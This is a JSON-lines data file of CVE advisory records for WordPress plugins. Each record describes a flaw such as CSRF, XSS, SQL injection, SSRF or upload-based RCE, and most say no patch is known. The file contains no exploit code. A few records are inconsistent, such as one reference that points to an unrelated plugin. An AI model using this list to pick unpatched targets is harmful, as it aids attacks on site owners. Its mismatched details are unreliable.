{"CVE_ID":"CVE-2024-8091","slug":"extended-search-plugin","versionImpact":"0.6.1","description":"The Enhanced Search Box WordPress plugin through 0.6.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ca90b81-7539-4a15-8c5a-39a8d96a74a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ca90b81-7539-4a15-8c5a-39a8d96a74a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9885","slug":"widget-or-sidebar-per-shortcode","versionImpact":"0.6.1","description":"The Widget or Sidebar Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sidebar' shortcode in all versions up to, and including, 0.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20584675-0d4a-4215-8132-e9ea95bee09b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20584675-0d4a-4215-8132-e9ea95bee09b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-or-sidebar-per-shortcode\\\/trunk\\\/class-widget-or-sidebar-per-shortcode.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-or-sidebar-per-shortcode\\\/trunk\\\/class-widget-or-sidebar-per-shortcode.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widget-or-sidebar-per-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widget-or-sidebar-per-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10390","slug":"elfsight-telegram-chat-cc","versionImpact":"1.1.0","description":"The Elfsight Telegram Chat CC plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the 'updatePreferences' function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/elfsight-telegram-chat\\\/25288599\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/elfsight-telegram-chat\\\/25288599\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13331","slug":"wp-dream-carousel","versionImpact":"1.0.1b","description":"The WP Dream Carousel WordPress plugin through 1.0.1b does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6425ccff-2e18-4498-b8b1-d493286efc7b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6425ccff-2e18-4498-b8b1-d493286efc7b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3870","slug":"1-decembrie-1918","versionImpact":"1","description":"The 1 Decembrie 1918 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.dec.2012. This is due to missing or incorrect nonce validation on the 1-decembrie-1918\/1-decembrie-1918.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-decembrie-1918\\\/tags\\\/1.dec.1918\\\/1-decembrie-1918.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-decembrie-1918\\\/tags\\\/1.dec.1918\\\/1-decembrie-1918.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-decembrie-1918\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-decembrie-1918\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73f7646f-f01f-4f57-836c-e0bd04764ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73f7646f-f01f-4f57-836c-e0bd04764ba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49419","slug":"esign-genie-for-wp","versionImpact":"2.0.3","description":"Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in esigngenie Foxit eSign for WordPress allows Retrieve Embedded Sensitive Data. This issue affects Foxit eSign for WordPress: from n\/a through 2.0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/esign-genie-for-wp\\\/vulnerability\\\/wordpress-foxit-esign-for-wordpress-2-0-3-other-vulnerability-type-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/esign-genie-for-wp\\\/vulnerability\\\/wordpress-foxit-esign-for-wordpress-2-0-3-other-vulnerability-type-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2068","slug":"file-manager-advanced-shortcode ","versionImpact":"2.3.2","description":"The File Manager Advanced Shortcode WordPress plugin through 2.3.2 does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to RCE in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f72953-56d2-4d86-a49b-311b5fc58056\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f72953-56d2-4d86-a49b-311b5fc58056\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4796","slug":"woocommerce-jetpack","versionImpact":"7.1.0","description":"The Booster for WooCommerce for WordPress is vulnerable to Information Disclosure via the 'wcj_wp_option' shortcode in versions up to, and including, 7.1.0 due to insufficient controls on the information retrievable via the shortcode. This makes it possible for authenticated attackers, with subscriber-level capabilities or above, to retrieve arbitrary sensitive site options.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L450\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L450\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4cd49b2-ff93-4582-906b-b690d8472c38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4cd49b2-ff93-4582-906b-b690d8472c38?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6326","slug":"master-slider","versionImpact":"3.9.3","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.9.3. This is due to missing or incorrect nonce validation on the 'process_bulk_action' function. This makes it possible for unauthenticated attackers to duplicate or delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0a7108-15ef-42d0-adce-fd5b0e6faf3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0a7108-15ef-42d0-adce-fd5b0e6faf3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/admin\\\/includes\\\/classes\\\/class-msp-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/admin\\\/includes\\\/classes\\\/class-msp-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2220","slug":"button-contact-vr","versionImpact":"4.7","description":"The Button contact VR WordPress plugin through 4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe8c001e-8880-4570-b010-a41fc8ee0c58\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe8c001e-8880-4570-b010-a41fc8ee0c58\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37556","slug":"wordpress-notification-bar","versionImpact":"1.3.10","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SeedProd WordPress Notification Bar allows Stored XSS.This issue affects WordPress Notification Bar: from n\/a through 1.3.10.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-notification-bar\\\/wordpress-wordpress-notification-bar-plugin-1-3-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-notification-bar\\\/wordpress-wordpress-notification-bar-plugin-1-3-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8052","slug":"ratings-shorttags","versionImpact":"1.6","description":"The Review Ratings WordPress plugin through 1.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d821a6d0-d749-4e02-9b7c-3065e66e1c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d821a6d0-d749-4e02-9b7c-3065e66e1c97\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9884","slug":"t-countdown","versionImpact":"2.4.8","description":"The T(-) Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tminus' shortcode in all versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a0dcdf-e98f-4e24-9900-49ca522b8038?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a0dcdf-e98f-4e24-9900-49ca522b8038?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/t-countdown\\\/trunk\\\/t-countdown.php#L810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/t-countdown\\\/trunk\\\/t-countdown.php#L810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/t-countdown\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/t-countdown\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52431","slug":"wp-video-robot","versionImpact":"1.20.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pressaholic WordPress Video Robot - The Ultimate Video Importer allows SQL Injection.This issue affects WordPress Video Robot - The Ultimate Video Importer: from n\/a through 1.20.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-video-robot\\\/wordpress-wp-video-robot-plugin-1-20-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-video-robot\\\/wordpress-wp-video-robot-plugin-1-20-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13330","slug":"justrows-free","versionImpact":"0.2","description":"The JustRows free WordPress plugin through 0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13924","slug":"starter-templates","versionImpact":"2.0.0","description":"The Starter Templates by FancyWP plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.0.0 via the 'http_request_host_is_external' filter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starter-templates\\\/trunk\\\/classess\\\/class-export.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starter-templates\\\/trunk\\\/classess\\\/class-export.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9355b100-08a9-4640-a91b-e56ba1ab9b07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9355b100-08a9-4640-a91b-e56ba1ab9b07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1398","slug":"ultimate-bootstrap-elements-for-elementor","versionImpact":"1.3.6","description":"The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018heading_title_tag\u2019 and \u2019heading_sub_title_tag\u2019 parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed191380-6037-4d59-8db7-cb33136a304e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed191380-6037-4d59-8db7-cb33136a304e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1450","slug":"shariff","versionImpact":"4.6.10","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'align'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/tags\\\/4.6.10\\\/shariff.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/tags\\\/4.6.10\\\/shariff.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8051","slug":"special-feed-items","versionImpact":"1.0.1","description":"The Special Feed Items WordPress plugin through 1.0.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5edf7ed-207c-48bb-9226-8647ad4348e4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5edf7ed-207c-48bb-9226-8647ad4348e4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9846","slug":"enable-shortcodes-inside-widgetscomments-and-experts","versionImpact":"1.0.0","description":"The The Enable Shortcodes inside Widgets,Comments and Experts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ac2544-f96b-4859-96de-795753a94264?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ac2544-f96b-4859-96de-795753a94264?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/trunk\\\/enable-shortcodes-inside-widgets-comments-experts.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/trunk\\\/enable-shortcodes-inside-widgets-comments-experts.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23931","slug":"dh-local-seo","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound WordPress Local SEO allows Blind SQL Injection. This issue affects WordPress Local SEO: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dh-local-seo\\\/vulnerability\\\/wordpress-wordpress-local-seo-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dh-local-seo\\\/vulnerability\\\/wordpress-wordpress-local-seo-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13329","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres  WordPress plugin through 0.9.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1328","slug":"mrlegend-typedjs","versionImpact":"1.2.0","description":"The Typed JS: A typewriter style animation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018typespeed\u2019 parameter in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrlegend-typedjs\\\/trunk\\\/public\\\/class-typed-js-public.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrlegend-typedjs\\\/trunk\\\/public\\\/class-typed-js-public.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mrlegend-typedjs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mrlegend-typedjs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdb15198-68dc-4612-abcc-6b02843f1629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdb15198-68dc-4612-abcc-6b02843f1629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3868","slug":"admin-bookmarks","versionImpact":"0.1","description":"The Custom Admin-Bar Favorites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'menuObject' parameter in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-bookmarks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-bookmarks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417fb507-a414-4bc2-ab01-d6f2fc554350?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417fb507-a414-4bc2-ab01-d6f2fc554350?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8690","slug":"addi-simple-slider","versionImpact":"2.0","description":"The Simple Responsive Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/addi-simple-slider\\\/tags\\\/2.0\\\/methods.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/addi-simple-slider\\\/tags\\\/2.0\\\/methods.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addi-simple-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addi-simple-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7888aedb-5421-4c3a-8459-d6177b398a06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7888aedb-5421-4c3a-8459-d6177b398a06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4319","slug":"advanced-cf7-db","versionImpact":"2.0.2","description":"The Advanced Contact form 7 DB plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'vsz_cf7_export_to_excel' function in versions up to, and including, 2.0.2. This makes it possible for unauthenticated attackers to download the entry data for submitted forms.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c66b185-fd4b-452d-890b-0f1850d8a7be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c66b185-fd4b-452d-890b-0f1850d8a7be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-cf7-db\\\/trunk\\\/admin\\\/class-advanced-cf7-db-admin.php#L1459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-cf7-db\\\/trunk\\\/admin\\\/class-advanced-cf7-db-admin.php#L1459\",\"refsource\":\"\",\"tags\":[]}]"}
